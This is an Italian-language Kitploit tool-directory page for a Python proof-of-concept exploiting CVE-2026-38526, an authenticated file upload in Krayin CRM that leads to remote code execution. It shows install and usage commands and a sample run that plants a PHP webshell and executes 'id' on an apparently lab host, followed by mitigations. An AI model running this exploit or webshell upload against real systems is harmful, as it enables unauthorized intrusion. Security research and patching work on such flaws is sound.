Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/mrdark-ops/cve-2026-38526
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebCTFPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHubmrdark-ops/cve-2026-38526

CVE-2026-38526

PoC Python che sfrutta CVE-2026-38526 in Krayin CRM <= 2.2.x: effettua l'autenticazione, carica un webshell PHP tramite /admin/tinymce/upload ed esegue comandi in remoto.

2 giorni faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-38526 — Krayin CRM ≤ 2.2.x RCE autenticato

⚠️ Avviso legale: questo codice è fornito a scopo educativo e per test autorizzati esclusivamente (CTF, bug bounty, laboratorio privato). L'autore non è responsabile per un utilizzo illegale.

Descrizione

Krayin CRM (Webkul) ≤ 2.2.x espone l'endpoint /admin/tinymce/upload che consente a un utente autenticato (anche con privilegi bassi) di caricare file senza validazione dell'estensione. Il file viene poi servito dalla cartella storage/, consentendo l'esecuzione arbitraria di codice PHP.

  • Tipo: Arbitrary File Upload → RCE
  • CVSS: 9.9 (Critico)
  • Autenticazione richiesta: Sì (qualsiasi account valido)

Installazione

git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt

Utilizzo

python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'

Opzioni:

OpzioneDescrizione
-t, --targetURL radice del target
-u, --userEmail dell'account Krayin
-p, --passwordPassword
-c, --commandComando da eseguire (predefinito: id)
--login-pathPercorso di login (predefinito: /admin/login)
--upload-pathPercorso di upload (predefinito: /admin/tinymce/upload)
--timeoutTimeout HTTP (predefinito: 15)

Esempio

$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
    -u [email protected] -p 'N27xh!!2ucY04' -c 'id'

[*] Recupero del token CSRF su http://billing.nexus.htb/admin/login
[*] Invio del modulo di login
[+] Autenticazione riuscita
[*] Upload di x8f2k1ab.php tramite http://billing.nexus.htb/admin/tinymce/upload
[+] Webshell accessibile: http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] Esecuzione: id

============================================================
[+] Comando: id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

Mitigazione

  • Aggiornare Krayin CRM alla versione corretta.
  • Limitare l'estensione dei file caricati (whitelist).
  • Vietare l'esecuzione PHP nelle cartelle storage/ e uploads/.
  • Applicare il principio del minimo privilegio sugli account CRM.

Disclaimer

Questo progetto è pubblicato a fini di ricerca sulla sicurezza. Qualsiasi utilizzo contro sistemi senza autorizzazione scritta preventiva è illegale e strettamente proibito.

Scarica lo strumento